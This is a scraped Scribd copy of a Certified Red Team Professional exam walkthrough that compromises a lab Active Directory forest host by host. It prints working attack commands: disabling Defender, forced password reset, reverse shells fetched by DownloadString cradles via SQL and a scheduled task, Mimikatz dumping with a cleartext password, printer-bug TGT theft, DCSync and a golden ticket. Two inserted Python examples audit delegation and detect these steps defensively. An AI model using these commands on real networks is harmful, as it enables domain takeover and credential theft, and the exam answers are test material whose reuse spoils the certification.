CRTP Exam Update

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
6K views10 pages

CRTP Exam Update

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 10

Pentester Academy
Certified Red Team Professional
Computer → user.garrison.castle.local
-----------------------------------------

PS: C:\Users\studentuser> powershell -ep bypass


Host /AD/Tools/* on hfs.exe

PS: C:\Users\studentuser> . .\PowerUp.ps1
PS: C:\Users\studentuser> Invoke-AllChecks

PS: C:\Users\studentuser> Invoke-ServiceAbuse -Name 'vds' -UserName 'garrison\studentuser'
>> Student user added to local administrators group

PS: C:\Users\studentuser> Set-MpPreference -DisableRealtimeMonitoring $true

Computer → uatsrv.garrison.castle.local
---------------------------------------------------

PS: C:\Users\studentuser> . .\SharpHound.ps1
PS: C:\Users\studentuser> Invoke-BloodHound
>> Upload the .zip file to BloodHound

>> Student user can ForceChangePassword on uatadmin (ACL auditing)

PS: C:\Users\studentuser> Set-ADAccountPassword -Identity uatadmin -NewPassword (ConvertTo-SecureString -AsPlainText "qwert@12345" -Force)

>> PS remote into the box as uatadmin

>> net localgroup "Administrators" studentuser /add
>> net localgroup "Remote Desktop Users" studentuser /add

PS: C:\Users\studentuser> Enter-PSSession -ComputerName uatsrv.garrison.castle.local

Enable RDP remotely (https://www.interfacett.com/blogs/how-to-remotely-enable-and-disable-rdp-remote-desktop/):
PS: C:\Users\studentuser> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

Computer → devsrv.garrison.castle.local
---------------------------------------------------

>> RDP into uatsrv.garrison.local as uatadmin

>> Import PowerUpSQL and run ...

PS: C:\Users\studentuser> Import-Module .\PowerUpSQL.ps1
PS: C:\Users\studentuser> Get-SQLInstanceDomain |

>> Import module and run powercat on studentuser machine

PS: C:\Users\studentuser> powercat -l -v -p 443 -t 1000

Use Invoke-SQLOSCmd from Empire to trigger the reverse shell:
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1

PS: C:\Users\studentuser> Invoke-SQLOSCmd -Verbose -Command "powershell iex(New-Object Net.WebClient).DownloadString('http://[REDACTED]/Invoke-PowerShellTcp.ps1')" -Instance devsrv.garrison.castle.local

>> Get back a reverse shell as devsqladmin on devsrv, which is local admin
>> net localgroup "Administrators" studentuser /add
>> net localgroup "Remote Desktop Users" studentuser /add

PS: C:\Users\studentuser> Enter-PSSession -ComputerName uatsrv.garrison.castle.local
PS: C:\Users\studentuser> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

Run mimikatz on devsrv and get the devsqladmin password in clear text: TheAccounttoRunMSSQLSvc1!

PS: C:\Users\studentuser> Invoke-Mimikatz

RDP into it after adding studentuser as local admin...


Computer → prodsrv.garrison.castle.local
---------------------------------------------------

BloodHound shows devmanager@garrison.castle.local can be used for running scheduled tasks

On devsrv run

PS: C:\Users\studentuser> Get-NetComputer -Unconstrained
prodsrv.garrison.castle.local
garrison-dc.garrison.castle.local

Import Mimikatz and run the module to check whether a forwardable host TGS for prodsrv is available

PS: C:\Users\studentuser> Invoke-Mimikatz -Command '"kerberos::list"'

Schedule a task on prodsrv as devmanager...

PS: C:\Users\studentuser> schtasks /create /S prodsrv.garrison.castle.local /SC Weekly /RU "GARRISON\devmanager" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://[Redacted]/Invoke-PowerShellTcp.ps1'')'"

>> Import module and run powercat on studentuser machine

PS: C:\Users\studentuser> powercat -l -v -p 443 -t 1000

>> Get reverse shell as devmanager on prodsrv
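The Get-NetComputer -Unconstrained finding above comes down to one userAccountControl bit. What follows is an added example, not part of the original write-up, that audits that exposure from the defender's side: it lists non-DC hosts with unconstrained delegation and privileged accounts that are not marked "cannot be delegated". The records are constructed stand-ins for LDAP results; the host and account names mirror the lab, and the flag values are the documented userAccountControl bits.

```python
# Added example (not from the original write-up): audit the userAccountControl
# bits behind the unconstrained-delegation finding. Records are constructed
# stand-ins for LDAP results; names mirror the lab hosts and accounts.

UF_NORMAL_ACCOUNT = 0x200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000       # set only on domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation
UF_NOT_DELEGATED = 0x100000            # "account is sensitive and cannot be delegated"

# Constructed sample data, not real directory output.
SAMPLE_COMPUTERS = [
    {"name": "GARRISON-DC$",
     "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"name": "PRODSRV$",
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"name": "DEVSRV$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT},
]
SAMPLE_PRIVILEGED_USERS = [
    {"name": "Administrator", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"name": "devmanager", "userAccountControl": UF_NORMAL_ACCOUNT | UF_NOT_DELEGATED},
]

def unconstrained_non_dcs(computers):
    """Non-DC hosts trusted for unconstrained delegation: every principal that
    authenticates to them leaves a reusable TGT in that host's LSASS."""
    return [c["name"] for c in computers
            if c["userAccountControl"] & UF_TRUSTED_FOR_DELEGATION
            and not c["userAccountControl"] & UF_SERVER_TRUST_ACCOUNT]

def delegatable_privileged_users(users):
    """Privileged accounts whose TGT such a host could still capture because
    the NOT_DELEGATED protection is not set (Protected Users also blocks it)."""
    return [u["name"] for u in users
            if not u["userAccountControl"] & UF_NOT_DELEGATED]

def audit(computers, users):
    """Summarise the exposure as hosts to fix and accounts to protect."""
    return {"hosts": unconstrained_non_dcs(computers),
            "exposed_accounts": delegatable_privileged_users(users)}

if __name__ == "__main__":
    report = audit(SAMPLE_COMPUTERS, SAMPLE_PRIVILEGED_USERS)
    for host in report["hosts"]:
        print(f"[!] {host}: unconstrained delegation on a non-DC")
    for user in report["exposed_accounts"]:
        print(f"[!] {user}: privileged and not marked 'cannot be delegated'")
```

The NOT_DELEGATED flag protects user accounts only; the garrison-dc$ machine account coerced in the next section is not covered by it, and the fix for that path is removing unconstrained delegation from the non-DC host.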

Computer → garrison-dc.garrison.castle.local
---------------------------------------------------

Once we get a foothold on prodsrv, run mimikatz on the box and capture the DC machine account hashes; remember we have unconstrained delegation set on prodsrv too...

PS: C:\Users\devmanager> .\Rubeus.exe monitor /interval:5 /nowrap

We will use MS-RPRN to abuse the printer bug

PS: C:\Users\devmanager> .\MS-RPRN.exe \\garrison-dc.garrison.castle.local \\

After you get the TGT, use Rubeus to inject the TGT of garrison-dc$

PS: C:\Users\devmanager> .\Rubeus.exe ptt

We can now run a DCSync attack against garrison-dc using the injected ticket

PS: C:\Users\devmanager> Invoke-Mimikatz -Command '"lsadump::dcsync

With the given permissions we can now PS-remote into garrison-dc.garrison.castle.local

Again, since we are local admin,

>> net localgroup "Administrators" studentuser /add
>> net localgroup "Remote Desktop Users" studentuser /add

And RDP into garrison-dc
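The steps in this and the previous sections each leave a Security log record: 4732 for the local Administrators additions, 4698 for the STCheck task, and 4662 for the DCSync replication. Because the DCSync runs under the garrison-dc$ TGT, a rule keyed on the account alone reads as normal replication; the added example below (not from the original write-up) correlates each 4662 with its 4624 logon source address instead. The events and the addresses 10.0.0.10 (garrison-dc) and 10.0.0.20 (prodsrv) are constructed.

```python
# Added example (not from the original write-up): detection over constructed
# Windows Security events for the steps above. The DCSync runs under the
# garrison-dc$ TGT, so a rule keyed on the account alone looks legitimate;
# correlating each 4662 with its 4624 logon source address catches it.

REPLICATION_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes-All
)
LOCAL_ADMINISTRATORS_SID = "S-1-5-32-544"
DC_ADDRESSES = {"10.0.0.10"}                 # constructed address for garrison-dc
CRADLE_MARKERS = ("downloadstring", "iex ", "invoke-expression")

# Constructed sample events; field names follow the Security log schema.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonId": "0x3e7a1", "TargetUserName": "GARRISON-DC$",
     "IpAddress": "10.0.0.20"},                       # logon from prodsrv
    {"EventID": 4662, "SubjectUserName": "GARRISON-DC$", "SubjectLogonId": "0x3e7a1",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "LogonId": "0x1234", "TargetUserName": "GARRISON-DC$",
     "IpAddress": "10.0.0.10"},                       # genuine DC-to-DC traffic
    {"EventID": 4662, "SubjectUserName": "GARRISON-DC$", "SubjectLogonId": "0x1234",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4698, "Computer": "prodsrv", "TaskName": "\\STCheck",
     "TaskContent": "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(...)'"},
    {"EventID": 4732, "Computer": "uatsrv", "TargetSid": LOCAL_ADMINISTRATORS_SID,
     "MemberName": "GARRISON\\studentuser"},
]

def detect(events):
    """Return one alert string per suspicious event, in log order."""
    # LogonId from 4624 lets a later 4662 be tied back to its source address.
    logon_source = {e["LogonId"]: e["IpAddress"] for e in events if e["EventID"] == 4624}
    alerts = []
    for e in events:
        if e["EventID"] == 4662 and any(g in e["Properties"] for g in REPLICATION_GUIDS):
            src = logon_source.get(e["SubjectLogonId"], "unknown")
            if src not in DC_ADDRESSES:                # replication from a non-DC
                alerts.append(f"dcsync:{e['SubjectUserName']} from {src}")
        elif e["EventID"] == 4698 and any(m in e["TaskContent"].lower() for m in CRADLE_MARKERS):
            alerts.append(f"schtask-cradle:{e['TaskName']}@{e['Computer']}")
        elif e["EventID"] == 4732 and e["TargetSid"] == LOCAL_ADMINISTRATORS_SID:
            alerts.append(f"local-admin-add:{e['MemberName']}@{e['Computer']}")
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("[!]", alert)
```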

Computer → castle-dc.castle.local
---------------------------------------------------

Now we can privesc to castle-dc using either the krbtgt hash or trust tickets

PS C:\Users\studentuser> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:garrison.castle.local /sid:<garrison domain sid here> /sids:<enterprise admin sid here> /krbtgt:<krbtgt hash obtained above here>

Next use the ptt module of mimikatz

PS C:\Users\studentuser> Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\studentuser\krbtgt_tkt.kirbi"'

Query WMI, or we can go the scheduled task way as mentioned earlier in case we need a shell

THANK YOU
